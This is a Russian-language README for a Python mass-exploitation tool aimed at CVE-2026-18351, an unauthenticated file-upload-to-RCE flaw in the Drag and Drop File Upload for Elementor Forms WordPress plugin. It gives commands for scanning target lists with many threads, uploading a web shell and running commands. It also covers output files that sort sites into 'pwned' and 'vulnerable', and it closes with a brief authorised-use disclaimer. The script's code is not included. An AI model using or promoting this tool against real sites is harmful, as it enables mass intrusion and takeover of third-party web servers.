Массовый эксплойт-инструмент для CVE-2026-18351 — неаутентифицированная загрузка произвольных файлов с переходом к RCE в Elementor Forms <= 1.6.0, с пассивным зондированием, загрузкой шелла и выполнением команд.
Массовый эксплойт для CVE-2026-18351 — неаутентифицированная загрузка произвольных файлов → RCE в Drag and Drop File Upload for Elementor Forms <= 1.6.0.
credit johenlastgen | telegram @johenlastgen | channel @jlgnetworkredirect
Внешних зависимостей нет — используется только стандартная библиотека Python.
python3 --version # 3.6+
# Одиночная цель — только пассивная проверка (без загрузки)
python3 mass.py --url http://target.com --check
# Одиночная цель — эксплуатация с командой по умолчанию (id)
python3 mass.py --url http://target.com --cmd id
# Одиночная цель — эксплуатация с произвольной командой
python3 mass.py --url http://target.com --cmd whoami
# Массовые цели — пассивная проверка
python3 mass.py --list targets.txt --threads 50 --check
# Массовые цели — эксплуатация
python3 mass.py --list targets.txt --threads 50 --cmd id
# Массовые цели — эксплуатация с настройкой таймаута
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami
# Сохранить полный лог
python3 mass.py --list targets.txt --output results.txt
# Сохранить только уязвимые цели
python3 mass.py --list targets.txt --output-vuln vuln.txt
# Сохранить только цели с подтверждённым RCE
python3 mass.py --list targets.txt --output-pwned pwned.txt
# Комбинированный вывод
python3 mass.py \
--list targets.txt \
--threads 50 \
--cmd id \
--output results.txt \
--output-vuln vuln.txt \
--output-pwned pwned.txt
| Опция | Описание |
|---|---|
--url | URL одиночной цели |
--list FILE | Файл со списком URL целей (по одному в строке) |
--check | Только пассивная проверка — без загрузки файла |
--cmd CMD | Команда для выполнения через шелл (по умолчанию: id) |
--threads N | Количество одновременных потоков (по умолчанию: 20) |
--timeout N | Таймаут на запрос в секундах (по умолчанию: 10) |
--output FILE | Сохранить полный лог в файл |
--output-vuln FILE | Сохранить в файл только URL уязвимых целей |
--output-pwned FILE | Сохранить в файл только цели с подтверждённым RCE |
| Состояние | Значение |
|---|---|
PWNED | Шелл загружен и RCE подтверждён |
VULN-NO-EXEC | Загрузка принята, но выполнение шелла не удалось |
PATCHED | Загрузка отклонена или nonce не найден |
ERROR | Сетевая ошибка или ошибка разбора |
Один URL в строке. Строки, начинающиеся с #, игнорируются.
http://target1.com
https://target2.com
# this line is ignored
http://target3.com
Этот проект предоставляется исключительно для авторизованных оценок безопасности, исследований в области защитной безопасности и проверки уязвимостей.
Используя это программное обеспечение, вы подтверждаете, что у вас есть явное разрешение на оценку целевых систем. Несанкционированный доступ к компьютерным системам запрещён и может нарушать применимое законодательство.
Автор и участники не поощряют и не одобряют несанкционированное использование этого проекта и не несут никакой ответственности за любое неправомерное использование, ущерб или юридические последствия, возникшие в результате его использования.
JohenLastGen — JLG NETWORK